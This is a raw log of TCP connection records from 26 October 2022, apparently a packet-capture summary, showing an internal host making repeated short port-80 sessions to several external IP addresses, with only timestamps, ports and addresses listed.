Oct 26, 2022 13:18:19.976440907 CEST	49897	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:19.976440907 CEST	49897	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:19.976731062 CEST	49897	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:19.976846933 CEST	49897	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:20.078485966 CEST	80	49897	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:25.537750959 CEST	49898	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:25.872632027 CEST	80	49898	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:25.872947931 CEST	49898	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:25.873047113 CEST	49898	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:26.208445072 CEST	80	49898	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:26.208539963 CEST	80	49898	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:26.208586931 CEST	80	49898	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:26.208868980 CEST	49898	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:26.877897978 CEST	49898	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:27.892793894 CEST	49899	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:28.232218027 CEST	80	49899	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:28.232424021 CEST	49899	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:28.232522011 CEST	49899	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:28.571898937 CEST	80	49899	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:28.572208881 CEST	80	49899	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:28.572259903 CEST	80	49899	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:28.572438955 CEST	49899	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:29.236139059 CEST	49899	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.251802921 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.585896015 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.586133003 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.586623907 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.586700916 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.586760044 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.920614004 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.920674086 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.920855999 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.920861006 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.920986891 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.921178102 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.921346903 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.921377897 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.921689987 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.921828032 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.922048092 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.922297955 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.922521114 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.922663927 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.922835112 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.923326015 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.923532009 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.923702002 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.923908949 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.924046040 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.924212933 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.924335957 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:30.924478054 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:30.924643993 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:31.255033970 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.255105019 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.255497932 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:31.255625010 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:31.255894899 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.256066084 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:31.256155968 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.256407022 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:31.257133961 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.257648945 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.258131027 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.259661913 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.260647058 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.261617899 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.262550116 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.263546944 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.589826107 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.590702057 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.592128992 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.593202114 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.593651056 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.593769073 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.594157934 CEST	80	49900	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:31.594331980 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:31.594846010 CEST	49900	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:32.610630035 CEST	49901	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:32.944858074 CEST	80	49901	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:32.945220947 CEST	49901	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:32.945220947 CEST	49901	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:33.279014111 CEST	80	49901	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:33.279133081 CEST	80	49901	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:33.279272079 CEST	80	49901	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:33.279516935 CEST	49901	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:33.279675961 CEST	49901	80	192.168.11.20	154.221.20.121
Oct 26, 2022 13:18:33.613512039 CEST	80	49901	154.221.20.121	192.168.11.20
Oct 26, 2022 13:18:38.801883936 CEST	49902	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:38.949225903 CEST	80	49902	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:38.949593067 CEST	49902	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:38.949594021 CEST	49902	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:39.097197056 CEST	80	49902	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:39.097276926 CEST	80	49902	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:39.097330093 CEST	80	49902	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:39.097734928 CEST	49902	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:39.952411890 CEST	49902	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:40.968051910 CEST	49903	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:41.114080906 CEST	80	49903	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:41.114279985 CEST	49903	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:41.114376068 CEST	49903	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:41.260543108 CEST	80	49903	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:41.260904074 CEST	80	49903	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:41.260972023 CEST	80	49903	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:41.261163950 CEST	49903	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:42.123900890 CEST	49903	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.139533997 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.285136938 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.285394907 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.285996914 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.286112070 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.431539059 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.431755066 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.432022095 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.432115078 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.432163954 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.432205915 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.432248116 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.432251930 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.432391882 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.432450056 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.432672024 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.578052044 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578116894 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578197002 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578269005 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578275919 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.578316927 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578363895 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578382015 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.578430891 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578453064 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.578476906 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578653097 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:43.578727007 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578774929 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.578947067 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.724150896 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.724210978 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.724270105 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.724690914 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.724747896 CEST	80	49904	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:43.724874020 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:44.295073986 CEST	49904	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:45.310887098 CEST	49905	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:45.457030058 CEST	80	49905	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:45.457355022 CEST	49905	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:45.457417011 CEST	49905	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:45.603760958 CEST	80	49905	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:45.603863955 CEST	80	49905	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:45.603950024 CEST	80	49905	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:45.604206085 CEST	49905	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:45.604300022 CEST	49905	80	192.168.11.20	64.64.242.59
Oct 26, 2022 13:18:45.750617027 CEST	80	49905	64.64.242.59	192.168.11.20
Oct 26, 2022 13:18:57.214569092 CEST	49906	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:18:57.244182110 CEST	80	49906	2.57.90.16	192.168.11.20
Oct 26, 2022 13:18:57.244389057 CEST	49906	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:18:57.244474888 CEST	49906	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:18:57.273797989 CEST	80	49906	2.57.90.16	192.168.11.20
Oct 26, 2022 13:18:57.273859024 CEST	80	49906	2.57.90.16	192.168.11.20
Oct 26, 2022 13:18:57.273904085 CEST	80	49906	2.57.90.16	192.168.11.20
Oct 26, 2022 13:18:57.274173975 CEST	49906	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:18:57.274270058 CEST	49906	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:18:57.303618908 CEST	80	49906	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:02.276309013 CEST	49907	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:02.302462101 CEST	80	49907	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:02.302700043 CEST	49907	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:02.302799940 CEST	49907	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:02.328834057 CEST	80	49907	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:02.328896046 CEST	80	49907	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:02.328939915 CEST	80	49907	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:02.329154015 CEST	49907	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:03.307701111 CEST	49907	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:04.322391987 CEST	49908	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:04.348898888 CEST	80	49908	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:04.349087000 CEST	49908	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:04.349206924 CEST	49908	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:04.375426054 CEST	80	49908	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:04.375495911 CEST	80	49908	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:04.375545025 CEST	80	49908	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:04.375685930 CEST	49908	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:05.353230000 CEST	49908	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.368685007 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.397816896 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.398086071 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.398644924 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.398710012 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.427859068 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.427895069 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.428078890 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.428106070 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.428155899 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.428246021 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.428256035 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.428301096 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.428423882 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.428592920 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.457489967 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.457547903 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.457597017 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.457753897 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.457869053 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.457880020 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:06.457953930 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.458003998 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.458173037 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.458282948 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.487399101 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.487503052 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.487550020 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.487617016 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.487797976 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.488049030 CEST	80	49909	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:06.488209009 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:07.399585009 CEST	49909	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:08.415400028 CEST	49910	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:08.444888115 CEST	80	49910	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:08.445101023 CEST	49910	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:08.445184946 CEST	49910	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:08.474623919 CEST	80	49910	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:08.474714041 CEST	80	49910	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:08.474788904 CEST	80	49910	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:08.474993944 CEST	49910	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:08.475087881 CEST	49910	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:19:08.504559994 CEST	80	49910	2.57.90.16	192.168.11.20
Oct 26, 2022 13:19:13.476569891 CEST	49911	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:13.668862104 CEST	80	49911	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:13.669315100 CEST	49911	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:13.669433117 CEST	49911	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:13.861809015 CEST	80	49911	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:13.866512060 CEST	80	49911	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:13.866586924 CEST	80	49911	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:13.866885900 CEST	49911	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:14.679133892 CEST	49911	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:15.694758892 CEST	49912	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:15.886395931 CEST	80	49912	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:15.886601925 CEST	49912	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:15.886722088 CEST	49912	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:16.078341007 CEST	80	49912	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:16.082746983 CEST	80	49912	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:16.082811117 CEST	80	49912	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:16.083465099 CEST	49912	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:16.897578955 CEST	49912	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:17.913214922 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.106843948 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.107120991 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.107727051 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.107819080 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.300916910 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301063061 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301145077 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.301184893 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301194906 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301222086 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.301434994 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301445961 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301454067 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.301574945 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.301599979 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301745892 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.301775932 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301884890 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301892996 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.301913977 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.302084923 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.302253962 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.494344950 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.494462013 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.494597912 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.494621038 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.494693995 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.494785070 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.494867086 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.494874954 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.494990110 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.495137930 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.495163918 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.495225906 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.495313883 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.495374918 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:18.495393991 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.495464087 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.495659113 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.536247015 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.688648939 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.688947916 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.689346075 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.689444065 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.689524889 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.689613104 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.689697027 CEST	80	49913	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:18.689872980 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:19.115787029 CEST	49913	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:20.131632090 CEST	49914	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:20.327651978 CEST	80	49914	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:20.327956915 CEST	49914	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:20.328089952 CEST	49914	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:20.523814917 CEST	80	49914	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:20.537517071 CEST	80	49914	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:20.578262091 CEST	49914	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:30.541280031 CEST	80	49914	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:30.541630030 CEST	49914	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:30.541630030 CEST	49914	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:19:30.737586975 CEST	80	49914	162.214.80.106	192.168.11.20
Oct 26, 2022 13:19:35.550113916 CEST	49915	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:35.707144022 CEST	80	49915	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:35.707390070 CEST	49915	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:35.707557917 CEST	49915	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:35.863986015 CEST	80	49915	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:35.980396032 CEST	80	49915	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:35.980478048 CEST	80	49915	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:35.980789900 CEST	49915	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:36.721206903 CEST	49915	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:37.736963034 CEST	49916	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:37.893471003 CEST	80	49916	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:37.893731117 CEST	49916	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:37.893887997 CEST	49916	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:38.050441980 CEST	80	49916	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:38.171796083 CEST	80	49916	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:38.172245979 CEST	80	49916	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:38.172415018 CEST	49916	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:38.908309937 CEST	49916	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:39.923948050 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.080851078 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.081235886 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.081707001 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.081813097 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.238342047 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.238368988 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.238557100 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.238679886 CEST	80	49917	162.0.238.95	192.168.11.20
Oct 26, 2022 13:19:40.238704920 CEST	49917	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:19:40.238748074 CEST	49917	80	192.168.11.20	162.0.238.95
